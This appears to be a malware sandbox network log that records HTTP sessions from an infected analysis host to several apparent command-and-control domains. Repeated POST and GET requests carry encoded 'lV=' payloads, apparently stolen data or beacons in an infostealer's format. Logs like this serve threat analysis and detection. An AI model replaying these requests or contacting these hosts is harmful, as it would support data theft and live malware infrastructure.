                                                                          Data Ascii: 495<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJsVj1uYkViNkJhcGpyQ1lkM3ZwSVU2NWRSVGFvUEsyYzQ4NFo5RExlbFRjcko0cDhoT2lCcGxJMzl6dHpoYWFsNzZxRllLZThvb0pGMjJtSS9KdlJQUjlLWnRFUHNHUFNadnBIejRnS1JiOVJIdGl2ODdTWnd4TXlJaz0mTFNiYVQ9emZ0NExvQnciLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45 [TRUNCATED]
                                                                          Jan 9, 2025 16:51:17.815377951 CET  52                 IN
                                                                          Data Ascii: } </script> </body></html>0


                                                                          Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                          54          192.168.11.20  49799        104.21.96.1     80
                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                          Jan 9, 2025 16:51:22.958621025 CET  795                OUT        POST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
                                                                          Jan 9, 2025 16:51:23.504389048 CET  814                IN         HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:23 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFs509HqJLvYm79m0vnQyDfLxdTKEfFPP7GSWI5E84fJWyTIVVqEIrhmvbsXom%2BSIpmeBwddYXJmEvuXmDeymdw6IE%2BXBhz70heOb4uN9r4zxw1rWhkFk89r1sEnEEkFCXi1"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596a0eb3b6075-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118631&min_rtt=118631&rtt_var=59315&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:51:23.504467964 CET  105                IN
                                                                          Jan 9, 2025 16:51:23.504498005 CET  5                  IN
                                                                          Data Ascii: 0


                                                                          Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                          55          192.168.11.20  49800        104.21.96.1     80
                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                          Jan 9, 2025 16:51:25.615835905 CET  815                OUT        POST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
                                                                          Jan 9, 2025 16:51:26.157382965 CET  911                IN         HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:26 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YxU0im9%2FgKYglvQzQ1aOytbTHnz8wo03tiSNRr36MRNGZBmLWf9FN2XmJNA585Z1i5FGqtxPgLf8uQY0%2B62nNLGqrwMyk9BWSimeERlNSiyc5fFgz7%2BwHTZu0zvO0gbnBTW"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596b18b08e81e-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119801&min_rtt=119801&rtt_var=59900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:51:26.157428026 CET  5                  IN
                                                                          Data Ascii: 0


                                                                          Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                          56          192.168.11.20  49801        104.21.96.1     80
                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                          Jan 9, 2025 16:51:28.271469116 CET  2578               OUT        POST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:28.271497011 CET  3867               OUT
                                                                          Data Ascii: 2sMflM59yA9OK/SRFa7B7WR/30WzXgcimvDzIqep5/gYh+Sa/aUO5pl8ghGWQkGENOc6Z/Y3kzwnzuLP+BQevab1BQL6Wvmcl47ytt7GKrJeTNJpJzYE6UETuJOWsFdwWbFl3nID9aMo0CBS0TKTeDK4KwxIl4j0+KvD0lxrwdVSjpt7Fuu04aOsplYuI5zvlmKj3Ll3NbqhPuNcVEmG8+SdWjMsSaJemQp3ISj3enZcxmO/c8C
                                                                          Jan 9, 2025 16:51:28.271570921 CET  1519               OUT
                                                                          Data Ascii: vRQLa93jaD4VC/SJutgS1RMAtqUUVDArkpUK1lSviqTP1+M6KaJPR0mWv0iYK1JumS65cnfcu/NzbtLsmrjWllI6OhuBcaQyB5TwURNiGw8eO3NDDmbpCqwsYiQyfR2j6odMbHjRT6JGWfuFGVBqe+3m9gUxY3MqdumPy7DIdHTNZzyWHGK+m9AfOzvAISudwld1HGPzswbj/UkvGLH6G6lJDyIyqMzHgNhMq13NOHvE98eaFiT
                                                                          Jan 9, 2025 16:51:28.855375051 CET  912                IN         HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:28 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovUOGJDxekgVVdv1hCWr6tjnLgQ3gIe0GGP1WftOKUhkcL6%2FgN5ncrva2n%2BbHRU3LySEvHDHejL72YkN%2F3UdOrXv1gvUauUxw1Z3HNORiIWlvtrjYk7lOOUwXNxcJq8xauNV"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596c21e47114d-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118941&min_rtt=118941&rtt_var=59470&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:51:28.855509043 CET  5                  IN
                                                                          Data Ascii: 0


                                                                          Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                          57          192.168.11.20  49802        104.21.96.1     80
                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                          Jan 9, 2025 16:51:30.923999071 CET  530                OUT        GET /3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:31.459163904 CET  928                IN         HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:31 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7dablU66gtaVq1nZcSaPvOgLeiTvvD0R2PcQ0X0dn7n6ftEh0VnU6%2F1BKg%2FPntAXkFOprO3O5cpH3zHDvDA%2F8GFpAGY4uqGnuIt32uDXJk6yQiN%2F5vJP9Eh1FxXd2sLK%2BEp"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff596d2ac92114d-ORD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118780&min_rtt=118780&rtt_var=59390&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 9, 2025 16:51:31.459302902 CET  5                  IN
                                                                          Data Ascii: 0


                                                                          Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                          58          192.168.11.20  49803        199.192.21.169  80
                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                          Jan 9, 2025 16:51:36.651113033 CET  789                OUT        POST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
Jan 9, 2025 16:51:36.843951941 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:36 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49804 | 199.192.21.169 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:51:39.351360083 CET | 809 | OUT | POST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
Jan 9, 2025 16:51:39.544110060 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:39 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.11.20 | 49805 | 199.192.21.169 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:51:42.056781054 CET | 1289 | OUT | POST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 35 69 7a 57 [TRUNCATED]
Jan 9, 2025 16:51:42.056830883 CET | 2578 | OUT
                                                                          Data Ascii: JVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapU
Jan 9, 2025 16:51:42.056884050 CET | 4091 | OUT
                                                                          Data Ascii: Di2b4MfuNUlFhFETOdqTmZWCoRyM8GlQJl8l+dPcy7jcViGw4wEAIE+IHFojD8OkI3Om1KwWykwNWOEUhUAQw8Ptp3yKO5q5KyRIOlUirOzAXUSc80ZeZI/KC3kUxdr38qxiO0WHrHHM6D1IAarJSBqHN32ATbikmjbWam+t0/8SLrBjC/m5nZODgSzwFCtR6spZ9KYV+K1zX21ahjyri6hyQmOZHCQnFvm4DK694IZOQBhm/M2
Jan 9, 2025 16:51:42.254570007 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:42 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49806 | 199.192.21.169 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:51:44.757000923 CET | 528 | OUT | GET /qps0/?lV=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 16:51:44.941435099 CET | 933 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:44 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.11.20 | 49807 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:51:58.437582970 CET | 792 | OUT | POST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
Jan 9, 2025 16:51:59.430126905 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:51:59 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.11.20 | 49808 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:52:01.270879030 CET | 812 | OUT | POST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
Jan 9, 2025 16:52:02.291054010 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:52:02 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.11.20 | 49809 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:52:04.110891104 CET | 2578 | OUT | POST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b 59 76 4a 43 [TRUNCATED]
Jan 9, 2025 16:52:04.110974073 CET | 5383 | OUT
                                                                          Data Ascii: x1CC5CLY0SfKu8oIrnm526YpOXCD266Y31M5pQBNyLwPnVZahVK5neJscwGKTPakaJ5AeTjdgJIWdEV23RLIDCVcroa9Ny/AEEt42oOcxCZuEZo4aX0BNRSHBByKWCDNZLG0CaxFBXO1FfpYjyV7gJBssljeqMgirhxwwvWLyQORtnarNab21QtoDfj2V0oYqFGBY0Baiw7KtowndhyNXrFs3RIonc4I+x7556bZQ3AvTCtcpgu
Jan 9, 2025 16:52:05.101855993 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
